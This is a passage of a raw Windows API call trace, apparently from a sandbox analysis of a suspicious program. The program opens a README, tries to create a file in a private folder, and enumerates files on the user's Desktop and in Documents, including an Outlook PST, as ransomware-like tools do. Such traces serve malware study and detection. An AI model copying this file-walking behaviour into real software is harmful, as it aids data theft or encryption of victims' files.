dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0153.169] GetFileType (hFile=0x4d0) returned 0x1 [0153.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0153.169] GetFileType (hFile=0x4d0) returned 0x1 [0153.169] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee868 | out: lpFileSizeHigh=0x2ee868*=0x0) returned 0x74e6 [0153.169] ReadFile (in: hFile=0x4d0, lpBuffer=0x237a564, nNumberOfBytesToRead=0x74e6, lpNumberOfBytesRead=0x2ee814, lpOverlapped=0x0 | out: lpBuffer=0x237a564*, lpNumberOfBytesRead=0x2ee814*=0x74e6, lpOverlapped=0x0) returned 1 [0153.171] CloseHandle (hObject=0x4d0) returned 1 [0153.214] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0153.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0153.215] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee85c | out: lpFileInformation=0x2ee85c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0153.215] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", nBufferLength=0x105, lpBuffer=0x2ee254, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFilePart=0x0) returned 0x45 [0153.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee748) returned 1 [0153.215] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0153.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ed580) returned 1 [0153.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0153.219] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpFilePart=0x0) returned 0x31 [0153.219] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpFilePart=0x0) returned 0x32 [0153.219] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0153.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee87c) returned 1 [0153.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0153.220] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x35 [0153.220] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpFilePart=0x0) returned 0x36 [0153.220] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94e8ef0 [0153.225] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.225] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0153.225] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0153.225] FindClose (in: hFindFile=0x94e8ef0 | out: hFindFile=0x94e8ef0) returned 1 [0153.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0153.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0153.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0153.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x35 [0153.225] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpFilePart=0x0) returned 0x36 [0153.225] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94e8ef0 [0153.226] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.226] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0153.226] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0153.226] FindClose (in: hFindFile=0x94e8ef0 | out: hFindFile=0x94e8ef0) returned 1 [0153.226] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0153.226] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0153.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8f8) returned 1 [0153.226] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0153.226] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x105, lpBuffer=0x2ee3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x0) returned 0x26 [0153.226] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x2ee620 | out: lpFindFileData=0x2ee620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1665760, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xf1665760, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94e8ef0 [0153.227] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1665760, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xf1665760, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.227] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1eb9200, ftCreationTime.dwHighDateTime=0x1d5dda0, ftLastAccessTime.dwLowDateTime=0x30bb1690, ftLastAccessTime.dwHighDateTime=0x1d5dc41, ftLastWriteTime.dwLowDateTime=0x30bb1690, ftLastWriteTime.dwHighDateTime=0x1d5dc41, nFileSizeHigh=0x0, nFileSizeLow=0x1008b, dwReserved0=0x0, dwReserved1=0x0, cFileName="051N 5MK8k48.ods", cAlternateFileName="051N5M~1.ODS")) returned 1 [0153.227] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6843920, ftCreationTime.dwHighDateTime=0x1d5d8ad, ftLastAccessTime.dwLowDateTime=0xe2b7dd50, ftLastAccessTime.dwHighDateTime=0x1d5e025, ftLastWriteTime.dwLowDateTime=0xe2b7dd50, ftLastWriteTime.dwHighDateTime=0x1d5e025, nFileSizeHigh=0x0, nFileSizeLow=0x7c9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="23Yw-skJm.rtf", cAlternateFileName="23YW-S~1.RTF")) returned 1 [0153.227] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd2e790, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0x1c61dd50, ftLastAccessTime.dwHighDateTime=0x1d5e5d8, ftLastWriteTime.dwLowDateTime=0x1c61dd50, ftLastWriteTime.dwHighDateTime=0x1d5e5d8, nFileSizeHigh=0x0, nFileSizeLow=0x6ab3, dwReserved0=0x0, dwReserved1=0x0, cFileName="8dFMbgTmZgC_.avi", cAlternateFileName="8DFMBG~1.AVI")) returned 1 [0153.227] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7b74aa0, ftCreationTime.dwHighDateTime=0x1d5d89c, ftLastAccessTime.dwLowDateTime=0xbb62cb70, ftLastAccessTime.dwHighDateTime=0x1d5e66f, ftLastWriteTime.dwLowDateTime=0xbb62cb70, ftLastWriteTime.dwHighDateTime=0x1d5e66f, nFileSizeHigh=0x0, nFileSizeLow=0x46a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="a_RYwLdlR28QRoN6J_.wav", cAlternateFileName="A_RYWL~1.WAV")) returned 1 [0153.227] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc8140f0, ftCreationTime.dwHighDateTime=0x1d5e3e2, ftLastAccessTime.dwLowDateTime=0xce584e40, ftLastAccessTime.dwHighDateTime=0x1d5e655, ftLastWriteTime.dwLowDateTime=0xce584e40, ftLastWriteTime.dwHighDateTime=0x1d5e655, nFileSizeHigh=0x0, nFileSizeLow=0x11f67, dwReserved0=0x0, dwReserved1=0x0, cFileName="B_V9.png", cAlternateFileName="")) returned 1 [0153.227] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98159b50, ftCreationTime.dwHighDateTime=0x1d5de15, ftLastAccessTime.dwLowDateTime=0xae511b30, ftLastAccessTime.dwHighDateTime=0x1d5d936, ftLastWriteTime.dwLowDateTime=0xae511b30, ftLastWriteTime.dwHighDateTime=0x1d5d936, nFileSizeHigh=0x0, nFileSizeLow=0x1404, dwReserved0=0x0, dwReserved1=0x0, cFileName="cJ6NTjjSczDlq4GKMmq.mp3", cAlternateFileName="CJ6NTJ~1.MP3")) returned 1 [0153.228] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdec24830, ftCreationTime.dwHighDateTime=0x1d5e39e, ftLastAccessTime.dwLowDateTime=0x31c60c20, ftLastAccessTime.dwHighDateTime=0x1d5e20e, ftLastWriteTime.dwLowDateTime=0x31c60c20, ftLastWriteTime.dwHighDateTime=0x1d5e20e, nFileSizeHigh=0x0, nFileSizeLow=0xff22, dwReserved0=0x0, dwReserved1=0x0, cFileName="ct4LNtbIL6FO7I9J7A.gif", cAlternateFileName="CT4LNT~1.GIF")) returned 1 [0153.228] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.228] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bfabd00, ftCreationTime.dwHighDateTime=0x1d5e681, ftLastAccessTime.dwLowDateTime=0xe6e0bfb0, ftLastAccessTime.dwHighDateTime=0x1d5dbb5, ftLastWriteTime.dwLowDateTime=0xe6e0bfb0, ftLastWriteTime.dwHighDateTime=0x1d5dbb5, nFileSizeHigh=0x0, nFileSizeLow=0x5527, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dj_Db5l6vQeyuys.mp3", cAlternateFileName="DJ_DB5~1.MP3")) returned 1 [0153.228] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a5a0a20, ftCreationTime.dwHighDateTime=0x1d5e4c5, ftLastAccessTime.dwLowDateTime=0x7a064630, ftLastAccessTime.dwHighDateTime=0x1d5d881, ftLastWriteTime.dwLowDateTime=0x7a064630, ftLastWriteTime.dwHighDateTime=0x1d5d881, nFileSizeHigh=0x0, nFileSizeLow=0x6fee, dwReserved0=0x0, dwReserved1=0x0, cFileName="EDix-MYQJ.m4a", cAlternateFileName="EDIX-M~1.M4A")) returned 1 [0153.228] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66d9c8b0, ftCreationTime.dwHighDateTime=0x1d5db6b, ftLastAccessTime.dwLowDateTime=0x177a2e00, ftLastAccessTime.dwHighDateTime=0x1d5da11, ftLastWriteTime.dwLowDateTime=0x177a2e00, ftLastWriteTime.dwHighDateTime=0x1d5da11, nFileSizeHigh=0x0, nFileSizeLow=0x92f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="I1aBpgLf8euG-RNj.png", cAlternateFileName="I1ABPG~1.PNG")) returned 1 [0153.228] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb870e530, ftCreationTime.dwHighDateTime=0x1d5df28, ftLastAccessTime.dwLowDateTime=0xa2328ec0, ftLastAccessTime.dwHighDateTime=0x1d5e57e, ftLastWriteTime.dwLowDateTime=0xa2328ec0, ftLastWriteTime.dwHighDateTime=0x1d5e57e, nFileSizeHigh=0x0, nFileSizeLow=0x1037, dwReserved0=0x0, dwReserved1=0x0, cFileName="jiCMMpojd.jpg", cAlternateFileName="JICMMP~1.JPG")) returned 1 [0153.228] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4fd88a0, ftCreationTime.dwHighDateTime=0x1d5e179, ftLastAccessTime.dwLowDateTime=0xa9ca3910, ftLastAccessTime.dwHighDateTime=0x1d5e814, ftLastWriteTime.dwLowDateTime=0xa9ca3910, ftLastWriteTime.dwHighDateTime=0x1d5e814, nFileSizeHigh=0x0, nFileSizeLow=0x13fd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jTH7ngKWMFidZN.rtf", cAlternateFileName="JTH7NG~1.RTF")) returned 1 [0153.228] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd68669e0, ftCreationTime.dwHighDateTime=0x1d5e7f3, ftLastAccessTime.dwLowDateTime=0x64e41c70, ftLastAccessTime.dwHighDateTime=0x1d5e69e, ftLastWriteTime.dwLowDateTime=0x64e41c70, ftLastWriteTime.dwHighDateTime=0x1d5e69e, nFileSizeHigh=0x0, nFileSizeLow=0x12b1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="kCyf3o.ots", cAlternateFileName="")) returned 1 [0153.229] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x216f3360, ftCreationTime.dwHighDateTime=0x1d5df93, ftLastAccessTime.dwLowDateTime=0x32c36c50, ftLastAccessTime.dwHighDateTime=0x1d5e0b8, ftLastWriteTime.dwLowDateTime=0x32c36c50, ftLastWriteTime.dwHighDateTime=0x1d5e0b8, nFileSizeHigh=0x0, nFileSizeLow=0x10f7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="KXQA99dezB.bmp", cAlternateFileName="KXQA99~1.BMP")) returned 1 [0153.229] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b360910, ftCreationTime.dwHighDateTime=0x1d5e6ff, ftLastAccessTime.dwLowDateTime=0x4d7faa80, ftLastAccessTime.dwHighDateTime=0x1d5d885, ftLastWriteTime.dwLowDateTime=0x4d7faa80, ftLastWriteTime.dwHighDateTime=0x1d5d885, nFileSizeHigh=0x0, nFileSizeLow=0x1b85, dwReserved0=0x0, dwReserved1=0x0, cFileName="ma8F_cd.png", cAlternateFileName="")) returned 1 [0153.229] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7f86720, ftCreationTime.dwHighDateTime=0x1d5e6d3, ftLastAccessTime.dwLowDateTime=0xab7a0da0, ftLastAccessTime.dwHighDateTime=0x1d5e6f0, ftLastWriteTime.dwLowDateTime=0xab7a0da0, ftLastWriteTime.dwHighDateTime=0x1d5e6f0, nFileSizeHigh=0x0, nFileSizeLow=0x1349e, dwReserved0=0x0, dwReserved1=0x0, cFileName="P402ZR.gif", cAlternateFileName="")) returned 1 [0153.229] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4692060, ftCreationTime.dwHighDateTime=0x1d5df20, ftLastAccessTime.dwLowDateTime=0xe392fd10, ftLastAccessTime.dwHighDateTime=0x1d5dd9e, ftLastWriteTime.dwLowDateTime=0xe392fd10, ftLastWriteTime.dwHighDateTime=0x1d5dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2c9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="QDssgSAbPBdwSDz3KSM2.swf", cAlternateFileName="QDSSGS~1.SWF")) returned 1 [0153.229] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x849947a0, ftCreationTime.dwHighDateTime=0x1d5e295, ftLastAccessTime.dwLowDateTime=0xd9c9c850, ftLastAccessTime.dwHighDateTime=0x1d5de1f, ftLastWriteTime.dwLowDateTime=0xd9c9c850, ftLastWriteTime.dwHighDateTime=0x1d5de1f, nFileSizeHigh=0x0, nFileSizeLow=0x1231d, dwReserved0=0x0, dwReserved1=0x0, cFileName="RWK-ERfyKVS1ubY43p5.png", cAlternateFileName="RWK-ER~1.PNG")) returned 1 [0153.229] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f8d8d0, ftCreationTime.dwHighDateTime=0x1d5e31f, ftLastAccessTime.dwLowDateTime=0x7010350, ftLastAccessTime.dwHighDateTime=0x1d5dd40, ftLastWriteTime.dwLowDateTime=0x7010350, ftLastWriteTime.dwHighDateTime=0x1d5dd40, nFileSizeHigh=0x0, nFileSizeLow=0x11041, dwReserved0=0x0, dwReserved1=0x0, cFileName="RYDs5gi.avi", cAlternateFileName="")) returned 1 [0153.229] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ac2fc0, ftCreationTime.dwHighDateTime=0x1d5de07, ftLastAccessTime.dwLowDateTime=0xcb0d6700, ftLastAccessTime.dwHighDateTime=0x1d5dca7, ftLastWriteTime.dwLowDateTime=0xcb0d6700, ftLastWriteTime.dwHighDateTime=0x1d5dca7, nFileSizeHigh=0x0, nFileSizeLow=0xa578, dwReserved0=0x0, dwReserved1=0x0, cFileName="TFQgVn4teOueBjEQc.flv", cAlternateFileName="TFQGVN~1.FLV")) returned 1 [0153.229] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1c8bf50, ftCreationTime.dwHighDateTime=0x1d5e06e, ftLastAccessTime.dwLowDateTime=0x73732b0, ftLastAccessTime.dwHighDateTime=0x1d5d857, ftLastWriteTime.dwLowDateTime=0x73732b0, ftLastWriteTime.dwHighDateTime=0x1d5d857, nFileSizeHigh=0x0, nFileSizeLow=0xb12b, dwReserved0=0x0, dwReserved1=0x0, cFileName="tjCawpC7bDKOzKu.mkv", cAlternateFileName="TJCAWP~1.MKV")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce8a5d10, ftCreationTime.dwHighDateTime=0x1d5dffa, ftLastAccessTime.dwLowDateTime=0xa536eda0, ftLastAccessTime.dwHighDateTime=0x1d5d863, ftLastWriteTime.dwLowDateTime=0xa536eda0, ftLastWriteTime.dwHighDateTime=0x1d5d863, nFileSizeHigh=0x0, nFileSizeLow=0x141af, dwReserved0=0x0, dwReserved1=0x0, cFileName="tQBv9w3Q01q.m4a", cAlternateFileName="TQBV9W~1.M4A")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x94e8ef0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a5a4020, ftCreationTime.dwHighDateTime=0x1d5dd91, ftLastAccessTime.dwLowDateTime=0x576fd890, ftLastAccessTime.dwHighDateTime=0x1d5e644, ftLastWriteTime.dwLowDateTime=0x576fd890, 